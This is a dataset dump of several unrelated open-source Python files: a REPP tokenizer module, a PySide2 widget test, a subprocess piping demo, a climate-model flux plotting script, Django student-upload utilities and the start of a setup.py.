False\n prev = None\n i = 0\n while prev != o:\n i += 1\n prev = o\n for operation in self.operations:\n for step in operation._apply(o, active):\n yield step\n o = step.output\n applied |= step.applied\n yield REPPStep(s, o, self, applied, _zeromap(o), _zeromap(o))\n logger.debug('>%s (done; iterated %d time(s))', self.name, i)\n\n\nclass REPP(object):\n \"\"\"\n A Regular Expression Pre-Processor (REPP).\n\n The normal way to create a new REPP is to read a .rpp file via the\n :meth:`from_file` classmethod. For REPPs that are defined in code,\n there is the :meth:`from_string` classmethod, which parses the same\n definitions but does not require file I/O. Both methods, as does\n the class's `__init__()` method, allow for pre-loaded and named\n external *modules* to be provided, which allow for external group\n calls (also see :meth:`from_file` or implicit module loading). By\n default, all external submodules are deactivated, but they can be\n activated by adding the module names to *active* or, later, via the\n :meth:`activate` method.\n\n A third classmethod, :meth:`from_config`, reads a PET-style\n configuration file (e.g., `repp.set`) which may specify the\n available and active modules, and therefore does not take the\n *modules* and *active* parameters.\n\n Args:\n name (str, optional): the name assigned to this module\n modules (dict, optional): a mapping from identifiers to REPP\n modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n\n def __init__(self, name=None, modules=None, active=None):\n self.info = None\n self.tokenize_pattern = None\n self.group = _REPPGroup(name=name)\n\n if modules is None:\n modules = []\n self.modules = dict(modules)\n self.active = set()\n if active is None:\n active = []\n for mod in active:\n self.activate(mod)\n\n @classmethod\n def from_config(cls, path, directory=None):\n \"\"\"\n Instantiate a REPP from a PET-style `.set` configuration file.\n\n The *path* parameter points to the configuration file.\n Submodules are loaded from *directory*. If *directory* is not\n given, it is the directory part of *path*.\n\n Args:\n path (str): the path to the REPP configuration file\n directory (str, optional): the directory in which to search\n for submodules\n \"\"\"\n path = Path(path).expanduser()\n if not path.is_file():\n raise REPPError(f'REPP config file not found: {path!s}')\n confdir = path.parent\n\n # TODO: can TDL parsing be repurposed for this variant?\n conf = path.read_text(encoding='utf-8')\n conf = re.sub(r';.*', '', conf).replace('\\n', ' ')\n m = re.search(\n r'repp-modules\\s*:=\\s*((?:[-\\w]+\\s+)*[-\\w]+)\\s*\\.', conf)\n t = re.search(\n r'repp-tokenizer\\s*:=\\s*([-\\w]+)\\s*\\.', conf)\n a = re.search(\n r'repp-calls\\s*:=\\s*((?:[-\\w]+\\s+)*[-\\w]+)\\s*\\.', conf)\n # f = re.search(\n # r'format\\s*:=\\s*(\\w+)\\s*\\.', conf)\n d = re.search(\n r'repp-directory\\s*:=\\s*(.*)\\.\\s*$', conf)\n\n if m is None:\n raise REPPError('repp-modules option must be set')\n if t is None:\n raise REPPError('repp-tokenizer option must be set')\n\n # mods = m.group(1).split()\n tok = t.group(1).strip()\n active = a.group(1).split() if a is not None else None\n # fmt = f.group(1).strip() if f is not None else None\n\n if directory is None:\n if d is not None:\n directory = d.group(1).strip(' \"')\n elif confdir.joinpath(tok + '.rpp').is_file():\n directory = confdir\n elif confdir.joinpath('rpp', tok + '.rpp').is_file():\n directory = confdir.joinpath('rpp')\n elif confdir.joinpath('../rpp', tok + '.rpp').is_file():\n directory = confdir.joinpath('../rpp')\n else:\n raise REPPError('Could not find a suitable REPP directory.')\n\n # ignore repp-modules and format?\n return REPP.from_file(\n directory.joinpath(tok + '.rpp'),\n directory=directory,\n active=active\n )\n\n @classmethod\n def from_file(cls, path, directory=None, modules=None, active=None):\n \"\"\"\n Instantiate a REPP from a `.rpp` file.\n\n The *path* parameter points to the top-level module. Submodules\n are loaded from *directory*. If *directory* is not given, it is\n the directory part of *path*.\n\n A REPP module may utilize external submodules, which may be\n defined in two ways. The first method is to map a module name\n to an instantiated REPP instance in *modules*. The second\n method assumes that an external group call `>abc` corresponds\n to a file `abc.rpp` in *directory* and loads that file. The\n second method only happens if the name (e.g., `abc`) does not\n appear in *modules*. Only one module may define a tokenization\n pattern.\n\n Args:\n path (str): the path to the base REPP file to load\n directory (str, optional): the directory in which to search\n for submodules\n modules (dict, optional): a mapping from identifiers to\n REPP modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n path = Path(path).expanduser()\n if directory is not None:\n directory = Path(directory).expanduser()\n else:\n directory = path.parent\n name = path.with_suffix('').name\n lines = _repp_lines(path)\n r = cls(name=name, modules=modules, active=active)\n _parse_repp(lines, r, directory)\n return r\n\n @classmethod\n def from_string(cls, s, name=None, modules=None, active=None):\n \"\"\"\n Instantiate a REPP from a string.\n\n Args:\n name (str, optional): the name of the REPP module\n modules (dict, optional): a mapping from identifiers to\n REPP modules\n active (iterable, optional): an iterable of default module\n activations\n \"\"\"\n r = cls(name=name, modules=modules, active=active)\n _parse_repp(s.splitlines(), r, None)\n return r\n\n def activate(self, mod):\n \"\"\"\n Set external module *mod* to active.\n \"\"\"\n self.active.add(mod)\n\n def deactivate(self, mod):\n \"\"\"\n Set external module *mod* to inactive.\n \"\"\"\n if mod in self.active:\n self.active.remove(mod)\n\n def _apply(self, s, active):\n return self.group._apply(s, active)\n\n def apply(self, s, active=None):\n \"\"\"\n Apply the REPP's rewrite rules to the input string *s*.\n\n Args:\n s (str): the input string to process\n active (optional): a collection of external module names\n that may be applied if called\n Returns:\n a :class:`REPPResult` object containing the processed\n string and characterization maps\n \"\"\"\n if active is None:\n active = self.active\n return self.group.apply(s, active=active)\n\n def trace(self, s, active=None, verbose=False):\n \"\"\"\n Rewrite string *s* like `apply()`, but yield each rewrite step.\n\n Args:\n s (str): the input string to process\n active (optional): a collection of external module names\n that may be applied if called\n verbose (bool, optional): if `False`, only output rules or\n groups that matched the input\n Yields:\n a :class:`REPPStep` object for each intermediate rewrite\n step, and finally a :class:`REPPResult` object after\n the last rewrite\n \"\"\"\n if active is None:\n active = self.active\n return self.group.trace(s, active=active, verbose=verbose)\n\n def tokenize(self, s, pattern=None, active=None):\n \"\"\"\n Rewrite and tokenize the input string *s*.\n\n Args:\n s (str): the input string to process\n pattern (str, optional): the regular expression pattern on\n which to split tokens; defaults to `[ \\t]+`\n active (optional): a collection of external module names\n that may be applied if called\n Returns:\n a :class:`~delphin.tokens.YYTokenLattice` containing the\n tokens and their characterization information\n \"\"\"\n if pattern is None:\n if self.tokenize_pattern is None:\n pattern = DEFAULT_TOKENIZER\n else:\n pattern = self.tokenize_pattern\n if active is None:\n active = self.active\n return self.group.tokenize(s, pattern=pattern, active=active)\n\n def tokenize_result(self, result, pattern=DEFAULT_TOKENIZER):\n \"\"\"\n Tokenize the result of rule application.\n\n Args:\n result: a :class:`REPPResult` object\n pattern (str, optional): the regular expression pattern on\n which to split tokens; defaults to `[ \\t]+`\n Returns:\n a :class:`~delphin.tokens.YYTokenLattice` containing the\n tokens and their characterization information\n \"\"\"\n return self.group.tokenize_result(result, pattern=pattern)\n\n\ndef _compile(pattern):\n try:\n return re.compile(pattern)\n except re.error:\n if _regex_available and '[' in pattern or ']' in pattern:\n warnings.warn(\n 'Invalid regex in REPP; see warning log for details.',\n REPPWarning)\n logger.warn(\"Possible unescaped brackets in %r; \"\n \"attempting to parse in compatibility mode\",\n pattern)\n return re.compile(pattern, flags=re.V0)\n else:\n raise\n\n\ndef _zeromap(s):\n return array('i', [0] * (len(s) + 2))\n\n\ndef _mergemap(map1, map2):\n \"\"\"\n Positions in map2 have an integer indicating the relative shift to\n the equivalent position in map1. E.g., the i'th position in map2\n corresponds to the i + map2[i] position in map1.\n \"\"\"\n merged = array('i', [0] * len(map2))\n for i, shift in enumerate(map2):\n newshift = shift + map1[i + shift]\n merged[i] = newshift\n return merged\n\n\ndef _copy_part(s, shift, parts, smap, emap):\n parts.append(s)\n smap.extend([shift] * len(s))\n emap.extend([shift] * len(s))\n\n\ndef _insert_part(s, w, shift, parts, smap, emap):\n parts.append(s)\n a = shift\n b = a - len(s)\n smap.extend(range(a, b, -1))\n a = shift + w - 1\n b = a - len(s)\n emap.extend(range(a, b, -1))\n\n\ndef _tokenize(result, pattern):\n s, sm, em = result # unpack for efficiency in loop\n toks = []\n pos = 0\n for m in re.finditer(pattern, result.string):\n if pos < m.start():\n toks.append((pos + sm[pos + 1],\n m.start() + em[m.start()],\n s[pos:m.start()]))\n pos = m.end()\n if pos < len(s):\n toks.append((pos + sm[pos + 1],\n len(s) + em[len(s)],\n s[pos:]))\n return toks\n\n\ndef _repp_lines(path):\n if not path.is_file():\n raise REPPError(f'REPP file not found: {path!s}')\n return path.read_text(encoding='utf-8').splitlines()\n\n\ndef _parse_repp(lines, r, directory):\n ops = list(_parse_repp_group(lines, r, directory))\n if lines:\n raise REPPError('Unexpected termination; maybe the # operator '\n 'appeared without an internal group.')\n r.group.operations.extend(ops)\n\n\ndef _parse_repp_group(lines, r, directory):\n igs = {} # internal groups\n while lines:\n line = lines.pop(0)\n if line.startswith(';') or line.strip() == '':\n continue # skip comments and empty lines\n elif line[0] == '!':\n match = re.match(r'([^\\t]+)\\t+(.*)', line[1:])\n if match is None:\n raise REPPError(f'Invalid rewrite rule: {line}')\n yield _REPPRule(match.group(1), match.group(2))\n elif line[0] == '<':\n fn = directory.joinpath(line[1:].rstrip())\n lines = _repp_lines(fn) + lines\n elif line[0] == '>':\n modname = line[1:].rstrip()\n if modname.isdigit():\n if modname in igs:\n yield igs[modname]\n else:\n raise REPPError(\n 'Iterative group not defined: ' + modname\n )\n else:\n if modname not in r.modules:\n if directory is None:\n raise REPPError('Cannot implicitly load modules if '\n 'a directory is not given.')\n mod = REPP.from_file(\n directory.joinpath(modname + '.rpp'),\n directory=directory,\n modules=r.modules\n )\n r.modules[modname] = mod\n yield _REPPGroupCall(modname, r.modules)\n elif line[0] == '#':\n igname = line[1:].rstrip()\n if igname.isdigit():\n if igname in igs:\n raise REPPError(\n 'Internal group name already defined: ' + igname\n )\n igs[igname] = _REPPIterativeGroup(\n operations=list(\n _parse_repp_group(lines, r, directory)\n ),\n name=igname\n )\n elif igname == '':\n return\n else:\n raise REPPError('Invalid internal group name: ' + igname)\n elif line[0] == ':':\n if r.tokenize_pattern is not None:\n raise REPPError(\n 'Only one tokenization pattern (:) may be defined.'\n )\n r.tokenize_pattern = line[1:]\n elif line[0] == '@':\n if r.info is not None:\n raise REPPError(\n 'No more than one meta-info declaration (@) may be '\n 'defined.'\n )\n r.info = line[1:]\n else:\n raise REPPError(f'Invalid declaration: {line}')\n","sub_path":"delphin/repp.py","file_name":"repp.py","file_ext":"py","file_size_in_byte":24851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"491768994","text":"# -*- coding: utf-8 -*-\n\nimport sys\n\nfrom PySide2 import QtWidgets\nfrom PySide2.QtTest import QTest\nfrom numpy import pi\nfrom Tests.GUI import gui_option # Set unit as [m]\nfrom pyleecan.Classes.LamSlotMag import LamSlotMag\nfrom pyleecan.Classes.SlotM17 import SlotM17\nfrom pyleecan.GUI.Dialog.DMachineSetup.SMSlot.PMSlot17.PMSlot17 import PMSlot17\n\n\nimport pytest\n\n\nclass TestPMSlot17(object):\n \"\"\"Test that the widget PMSlot17 behave like it should\"\"\"\n\n def setup_method(self):\n self.test_obj = LamSlotMag(Rint=0.1, Rext=0.2)\n self.test_obj.slot = SlotM17(Zs=2)\n self.test_obj.magnet.Lmag = 0.12\n self.widget = PMSlot17(self.test_obj)\n\n @classmethod\n def setup_class(cls):\n \"\"\"Start the app for the test\"\"\"\n print(\"\\nStart Test TestPMSlot17\")\n if not QtWidgets.QApplication.instance():\n cls.app = QtWidgets.QApplication(sys.argv)\n else:\n cls.app = QtWidgets.QApplication.instance()\n\n @classmethod\n def teardown_class(cls):\n \"\"\"Exit the app after the test\"\"\"\n cls.app.quit()\n\n def test_init(self):\n \"\"\"Check that the Widget spinbox initialise to the lamination value\"\"\"\n\n assert self.widget.lf_Lmag.value() == 0.12\n\n def test_set_Lmag(self):\n \"\"\"Check that the Widget allow to update Lmag\"\"\"\n # Check Unit\n assert self.widget.unit_Lmag.text() == \"[m]\"\n # Change value in GUI\n self.widget.lf_Lmag.clear()\n QTest.keyClicks(self.widget.lf_Lmag, \"0.34\")\n self.widget.lf_Lmag.editingFinished.emit() # To trigger the slot\n\n assert self.widget.lamination.magnet.Lmag == 0.34\n assert self.test_obj.magnet.Lmag == 0.34\n\n def test_check(self):\n \"\"\"Check that the check is working correctly\"\"\"\n self.test_obj = LamSlotMag(Rint=0.1, Rext=0.9)\n # p check\n self.test_obj.slot = SlotM17(Zs=4)\n self.widget = PMSlot17(self.test_obj)\n assert self.widget.check(self.test_obj) == \"SlotM17 must have p=1\"\n\n\nif __name__ == \"__main__\":\n a = TestPMSlot17()\n a.setup_class()\n a.setup_method()\n a.test_check()\n a.teardown_class()\n print(\"Done\")\n","sub_path":"Tests/GUI/Dialog/DMachineSetup/PMSlot/test_PMSlot17.py","file_name":"test_PMSlot17.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"643860650","text":"import subprocess\nimport threading\nimport time\n\ncmd = \"python cd.py\"\np = subprocess.Popen(cmd,\n\tshell=True,\n\tbufsize=64,\n\tstdin=subprocess.PIPE,\n\tstderr=subprocess.PIPE,\n\tstdout=subprocess.PIPE)\n\nreadBuffer = []\n\ndef readThread():\n\tprint(\"readThread start!\")\n\twhile True:\n\t\tline = p.stdout.readline().decode(\"utf-8\").rstrip()\n\t\tif (line != ''):\n\t\t\tprint(line)\n\t\t\treadBuffer.append(line)\n\t\telse:\n\t\t\ttime.sleep(1000)\n\nrT = threading.Thread(target = readThread)\nrT.start()\n\nwhile True:\n\ttry:\n\t\tp.stdin.write(bytes(str(5) + '\\n', 'utf-8'))\n\t\tp.stdin.flush()\n\t\ttime.sleep(1)\n\t\tprint(readBuffer)\n\t\treadBuffer = []\n\texcept:\n\t\tpass","sub_path":"Server/Demo/Demo_io/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501651192","text":"#diy.py\nclass Diy():\n def __init__(self, first_n, last_n, email, country_code, tel, github, discord_id, country_birth, country_loc, gender, motivation, coding_level, groups, extra):\n self.first_n = first_n\n self.last_n = last_n\n self.email = email\n self.country_code = country_code\n self.tel = tel\n self.github = github\n self.discord_id = discord_id\n self.country_birth = country_birth\n self.country_loc = country_loc\n self.gender = gender\n self.motivation = motivation\n self.coding_level= coding_level\n self.groups =groups\n self.extra = extra\n \n def my_print(self):\n for attr, value in self.__dict__.items():\n print(attr, \": \", value) \n\n\n \n\n\n","sub_path":"Others/SoC_weekly/soc-wk2-cert-Jessica-Sanchez/diy.py","file_name":"diy.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500648387","text":"#=====================================================\n# import modules\n#=====================================================\n# os\nimport os\n\n#import netCDF4\nfrom netCDF4 import Dataset as netcdf_dataset\n\n# cartopy\n#import cartopy.crs as ccrs\n#from cartopy.mpl.geoaxes import GeoAxes\n#from cartopy.mpl.ticker import LongitudeFormatter, LatitudeFormatter\n#from cartopy.util import add_cyclic_point\n\n# matplotlib\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import AxesGrid\nimport matplotlib.colors as colors\nimport matplotlib.collections as collections\n\n# numpy\nimport numpy as np\n\n# scipy\nfrom scipy import stats\n\n# parameters\nfrom get_parameters import get_area_mean_min_max\n\n#--------------------\n# start here\n#--------------------\n\n# data path\nctl_name=\"CTL\" #os.environ[\"ctl_name\"]\nexp_name=\"TSIS\" #os.environ[\"exp_name\"]\nctl_pref=\"solar_CTL_cesm211_ETEST-f19_g17-ens0_5days\"\nexp_pref=\"solar_TSIS_cesm211_ETEST-f19_g17-ens0_5days\"\n\nfpath_ctl=\"/raid00/xianwen/data/cesm211_solar_exp/\"+ctl_pref+\"/\"\nfpath_exp=\"/raid00/xianwen/data/cesm211_solar_exp/\"+exp_pref+\"/\"\n \nfigure_name=\"fig3c_zonal_sfc_net_5day-diag_uv+vis_ANN_shaded\"\n#figure_name=\"fig3e_zonal_sfc_net_5day-diag_nir_ANN_shaded\"\nunits=r\"Wm$^-$$^2$\"\n\nvarnms_vis_dn=np.array([\"FSSDS13\",\"FSSDS12\",\"FSSDS11\",\"FSSDS10\",\"FSSDS09\"])\nvarnms_nir_dn=np.array([\"FSSDS08\",\"FSSDS07\",\"FSSDS06\",\"FSSDS05\",\"FSSDS04\",\\\n \"FSSDS03\",\"FSSDS02\",\"FSSDS01\",\"FSSDS14\"])\n\nvarnms_vis_up=np.array([\"FSSUS13\",\"FSSUS12\",\"FSSUS11\",\"FSSUS10\",\"FSSUS09\"])\nvarnms_nir_up=np.array([\"FSSUS08\",\"FSSUS07\",\"FSSUS06\",\"FSSUS05\",\"FSSUS04\",\\\n \"FSSUS03\",\"FSSUS02\",\"FSSUS01\",\"FSSUS14\"])\n\nnlat=np.int64(96)\nmeans_yby_ctl_dn=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_dn=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_dn=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_dn=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_dn=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_dn=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_dn=np.zeros((2)) #year by year mean for each variable\n\nmeans_yby_ctl_up=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_up=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_up=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_up=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_up=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_up=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_up=np.zeros((2)) #year by year mean for each variable\n\nmeans_yby_ctl_net=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_yby_exp_net=np.zeros((2,nlat)) #year by year mean for each variable\nmeans_ctl_net=np.zeros((2,nlat)) #multi-year mean for each variable\nmeans_exp_net=np.zeros((2,nlat)) #multi-year mean for each variable\ndiffs_net=np.zeros((2,nlat)) #multi-year exp-ctl diff for each variable\ngm_yby_ctl_net=np.zeros((2)) #year by year mean for each variable\ngm_yby_exp_net=np.zeros((2)) #year by year mean for each variable\n\nmeans_yby_ctl_fice=np.zeros((nlat)) #year by year mean for each variable\nmeans_yby_exp_fice=np.zeros((nlat)) #year by year mean for each variable\n\n# open data file\nfctl=fpath_ctl+ctl_pref+\"_climo_ANN.nc\"\nfexp=fpath_exp+exp_pref+\"_climo_ANN.nc\"\nfile_ctl=netcdf_dataset(fctl,\"r\")\nfile_exp=netcdf_dataset(fexp,\"r\")\n\n# read lat and lon\nlat=file_ctl.variables[\"lat\"]\nlon=file_ctl.variables[\"lon\"]\n\ndtctl_fice=file_ctl.variables[\"ICEFRAC\"][0,:,:]\nmeans_yby_ctl_fice[:]= np.mean(dtctl_fice[:,:],axis=1)\n\n# read data and calculate mean/min/max\nfor vn in varnms_vis_dn:\n dtctl_dn=file_ctl.variables[vn][0,:,:]\n dtexp_dn=file_exp.variables[vn][0,:,:] \n means_yby_ctl_dn[0,:]= means_yby_ctl_dn[0,:] + np.mean(dtctl_dn[:,:],axis=1)\n means_yby_exp_dn[0,:]= means_yby_exp_dn[0,:] + np.mean(dtexp_dn[:,:],axis=1)\n gm_yby_ctl_dn[0]=gm_yby_ctl_dn[0]+get_area_mean_min_max(dtctl_dn[:,:],lat[:])[0]\n gm_yby_exp_dn[0]=gm_yby_exp_dn[0]+get_area_mean_min_max(dtexp_dn[:,:],lat[:])[0]\n\nfor vn in varnms_nir_dn:\n dtctl_dn=file_ctl.variables[vn][0,:,:]\n dtexp_dn=file_exp.variables[vn][0,:,:] \n means_yby_ctl_dn[1,:]= means_yby_ctl_dn[1,:] + np.mean(dtctl_dn[:,:],axis=1) #[0,:]\n means_yby_exp_dn[1,:]= means_yby_exp_dn[1,:] + np.mean(dtexp_dn[:,:],axis=1) #[0,:]\n gm_yby_ctl_dn[1]=gm_yby_ctl_dn[1]+get_area_mean_min_max(dtctl_dn[:,:],lat[:])[0]\n gm_yby_exp_dn[1]=gm_yby_exp_dn[1]+get_area_mean_min_max(dtexp_dn[:,:],lat[:])[0]\n\nfor vn in varnms_vis_up:\n dtctl_up=file_ctl.variables[vn][0,:,:]\n dtexp_up=file_exp.variables[vn][0,:,:] \n means_yby_ctl_up[0,:]= means_yby_ctl_up[0,:] + np.mean(dtctl_up[:,:],axis=1)\n means_yby_exp_up[0,:]= means_yby_exp_up[0,:] + np.mean(dtexp_up[:,:],axis=1)\n gm_yby_ctl_up[0]=gm_yby_ctl_up[0]+get_area_mean_min_max(dtctl_up[:,:],lat[:])[0]\n gm_yby_exp_up[0]=gm_yby_exp_up[0]+get_area_mean_min_max(dtexp_up[:,:],lat[:])[0]\n\nfor vn in varnms_nir_up:\n dtctl_up=file_ctl.variables[vn][0,:,:]\n dtexp_up=file_exp.variables[vn][0,:,:] \n means_yby_ctl_up[1,:]= means_yby_ctl_up[1,:] + np.mean(dtctl_up[:,:],axis=1) #[0,:]\n means_yby_exp_up[1,:]= means_yby_exp_up[1,:] + np.mean(dtexp_up[:,:],axis=1) #[0,:]\n gm_yby_ctl_up[1]=gm_yby_ctl_up[1]+get_area_mean_min_max(dtctl_up[:,:],lat[:])[0]\n gm_yby_exp_up[1]=gm_yby_exp_up[1]+get_area_mean_min_max(dtexp_up[:,:],lat[:])[0]\n\nmeans_yby_ctl_net[:,:]=means_yby_ctl_dn[:,:]-means_yby_ctl_up[:,:]\nmeans_yby_exp_net[:,:]=means_yby_exp_dn[:,:]-means_yby_exp_up[:,:]\ngm_yby_ctl_net[:]=gm_yby_ctl_dn[:]-gm_yby_ctl_up[:]\ngm_yby_exp_net[:]=gm_yby_exp_dn[:]-gm_yby_exp_up[:]\n\n# compute multi-year mean and ttest\n###siglev=0.05\n###\nmeans_ctl_dn=means_yby_ctl_dn\nmeans_exp_dn=means_yby_exp_dn\ndiffs_dn=means_exp_dn-means_ctl_dn\n###ttest=stats.ttest_ind(means_yby_ctl_dn,means_yby_exp_dn,axis=0)\n###pvalues_dn=ttest.pvalue\n###diffs_sig_dn=np.zeros(diffs_dn.shape)\n###diffs_sig_dn[:,:]=np.nan\n###\nmeans_ctl_up=means_yby_ctl_up\nmeans_exp_up=means_yby_exp_up\ndiffs_up=means_exp_up-means_ctl_up\n###ttest=stats.ttest_ind(means_yby_ctl_up,means_yby_exp_up,axis=0)\n###pvalues_up=ttest.pvalue\n###diffs_sig_up=np.zeros(diffs_up.shape)\n###diffs_sig_up[:,:]=np.nan\n###\nmeans_ctl_net=means_yby_ctl_net\nmeans_exp_net=means_yby_exp_net\ndiffs_net=means_exp_net-means_ctl_net\ndiffs_net_bb=diffs_net[0,:]+diffs_net[1,:]\n\n#compute domain mean\n#diffs_net_bb_mask=np.where(means_yby_ctl_fice[:]>0.1,diffs_net_bb,np.nan)\ndiffs_net_bb_mask=np.ma.MaskedArray(diffs_net_bb,mask=means_yby_ctl_fice[:]>0.1)\n#print(diffs_net_bb_mask)\nlatr=np.deg2rad(lat)\nweights=np.cos(latr)\navg_Antarctic=np.average(diffs_net_bb_mask[0:40],axis=0,weights=weights[0:40]) \navg_Arctic=np.average(diffs_net_bb_mask[60:],axis=0,weights=weights[60:]) \n\n#print(avg_Antarctic)\n#print(avg_Arctic)\n#exit()\n\n###ttest=stats.ttest_ind(means_yby_ctl_net,means_yby_exp_net,axis=0)\n###pvalues_net=ttest.pvalue\n###diffs_sig_net=np.zeros(diffs_net.shape)\n###diffs_sig_net[:,:]=np.nan\n###\nzeros=np.zeros(diffs_dn.shape)\n###\n####print(diffs_sig.size)\n###\n###for iv in range(pvalues_up.shape[0]):\n### for ip in range(pvalues_up.shape[1]):\n### if pvalues_up[iv,ip] < siglev:\n### diffs_sig_up[iv,ip]=diffs_up[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n###\n###for iv in range(pvalues_dn.shape[0]):\n### for ip in range(pvalues_dn.shape[1]):\n### if pvalues_dn[iv,ip] < siglev:\n### diffs_sig_dn[iv,ip]=diffs_dn[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n###\n###for iv in range(pvalues_net.shape[0]):\n### for ip in range(pvalues_net.shape[1]):\n### if pvalues_net[iv,ip] < siglev:\n### diffs_sig_net[iv,ip]=diffs_net[iv,ip]\n### #else:\n### # diffs_unsig[iv,ip]=diffs[iv,ip]\n\n#----------------\n# make the plot\n#----------------\n\nfig=plt.figure(figsize=(7,4))\n\n#ax1=fig.add_axes([0.14,0.58,0.8,0.36])\n#ax1.plot(lat[:],means_ctl_dn[0,:],color=\"k\",lw=2,ls=\"-\",label=\"UV+VIS down\")\n#ax1.plot(lat[:],means_ctl_dn[1,:],color=\"r\",lw=2,ls=\"-\",label=\"NIR down\")\n#ax1.plot(lat[:],means_ctl_up[0,:],color=\"g\",lw=2,ls=\"-\",label=\"UV+VIS up\")\n#ax1.plot(lat[:],means_ctl_up[1,:],color=\"darkorchid\",lw=2,ls=\"-\",label=\"NIR up\")\n#ax1.legend(fontsize=8)\n#ax1.set_title(\"SFC Fluxes (CESM2)\",fontsize=14)\n#ax1.set_ylabel(units,fontsize=14)\n#ax1.set_xlim(-90,90)\n#ax1.set_ylim(-4,160)\n#plt.xticks(fontsize=12)\n#plt.yticks(fontsize=12)\n\nax2=fig.add_axes([0.14,0.15,0.8,0.72])\n# Figure 3c: UV+VIS.\nax2.plot(lat[:],diffs_dn[0,:],color=\"k\",lw=1,label=\"\\u0394UV+VIS down\")\nax2.plot(lat[:],diffs_up[0,:],color=\"g\",lw=1,ls=\"-\",label=\"\\u0394UV+VIS up\")\nax2.plot(lat[:],diffs_net[0,:],color=\"k\",lw=2,ls=\"--\",label=\"\\u0394UV+VIS net\")\n\n# Figure 3e: NIR.\n#ax2.plot(lat[:],diffs_dn[1,:],color=\"r\",lw=1,label=\"\\u0394NIR down\")\n#ax2.plot(lat[:],diffs_up[1,:],color=\"darkorchid\",lw=1,ls=\"-\",label=\"\\u0394NIR up\")\n#ax2.plot(lat[:],diffs_net[1,:],color=\"r\",lw=2,ls=\"--\",label=\"\\u0394NIR net\")\n\nax2.plot(lat[:],zeros[0,:],color=\"gray\",lw=1)\nax2.legend(fontsize=10)\nax2.set_title(\"Diff in SFC Flux (TSIS-1 - CESM2, diag)\",fontsize=14) #+var_long_name,fontsize=12)\nax2.set_ylabel(units,fontsize=14)\nax2.set_xlabel(\"Latitude\",fontsize=14)\nax2.set_xlim(-90,90)\nax2.set_ylim(-1.6,2.15)\nplt.xticks(fontsize=12)\nplt.yticks(fontsize=12)\n\n# add shading \ncollection = collections.BrokenBarHCollection.span_where(lat[:], ymin=-1.6, ymax=2.15, \\\n where=means_yby_ctl_fice >0.1,facecolor='y',alpha=0.3)\nax2.add_collection(collection)\n\nplt.savefig(\"./figures/\"+figure_name+\".pdf\")\nplt.savefig(\"./figures/\"+figure_name+\".png\",dpi=150)\nplt.show()\n\nexit()\n","sub_path":"plots/plot_fig3ce_zonal_mean_net_sfc_diff_5day.py","file_name":"plot_fig3ce_zonal_mean_net_sfc_diff_5day.py","file_ext":"py","file_size_in_byte":9699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187591141","text":"import os\nimport xlrd\nimport yaml\nfrom django.db import transaction, IntegrityError\nfrom django.contrib.auth.hashers import make_password\nfrom ..models import StudentProfile\nfrom ..auth import CustomUser\nfrom ..serializers import CustomUserSerializer\nfrom ..models import Subject\nfrom testing_system.settings import QUESTIONS_PACK_ROOT\n\n\ndef jwt_response_payload_handler(token, user=None, request=None):\n return {\n 'token': token,\n 'user': CustomUserSerializer(user, context={'request': request}).data\n }\n\n\ndef upload_students(file, callback=None):\n book = xlrd.open_workbook(file_contents=file.read())\n sheet = book.sheet_by_index(0)\n edu_group = sheet.cell(0, 0).value\n record_keys = ['username', 'last_name', 'first_name', 'patronymic']\n for row in range(1, sheet.nrows):\n record = {key: sheet.cell(row, col).value for key, col in zip(record_keys, range(0, len(record_keys)))}\n username_error_msg = 'Номер зачетной книжки должен являться целым числом'\n username = record['username']\n try:\n username_int = int(username)\n except ValueError:\n raise TypeError(username_error_msg)\n if type(username) is not float:\n raise TypeError(username_error_msg)\n record['username'] = str(username_int)\n record['password'] = make_password(record['username'])\n with transaction.atomic():\n try:\n user = CustomUser.objects.create(**record)\n profile = StudentProfile(edu_group=edu_group, user=user)\n profile.full_clean()\n profile.save()\n except IntegrityError:\n if callback:\n callback(f'Пользователь {record[\"first_name\"]} {record[\"last_name\"]} \\\n ({record[\"username\"]}) уже существует в базе данных')\n\n\ndef get_questions_pack(tutor_profile, subject_id=None):\n subjects = Subject.objects.filter(tutorprofile=tutor_profile)\n if subject_id:\n subjects = subjects.filter(pk=subject_id)\n data = []\n for subject in subjects:\n filepath = os.path.join(QUESTIONS_PACK_ROOT, f'{subject.name}.yml')\n obj = {\n 'subject': subject.name,\n 'questions': [],\n }\n if os.path.exists(filepath):\n with open(filepath, 'r') as f:\n obj['questions'] = yaml.safe_load(f)\n data.append(obj)\n return data\n","sub_path":"api/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"581412066","text":"import sys\nfrom setuptools import find_packages, setup\n\ninstall_requires = [\n 'numpy>=1.11.1', 'pyyaml', 'six', 'addict', 'requests', 'opencv-python'\n]\nif 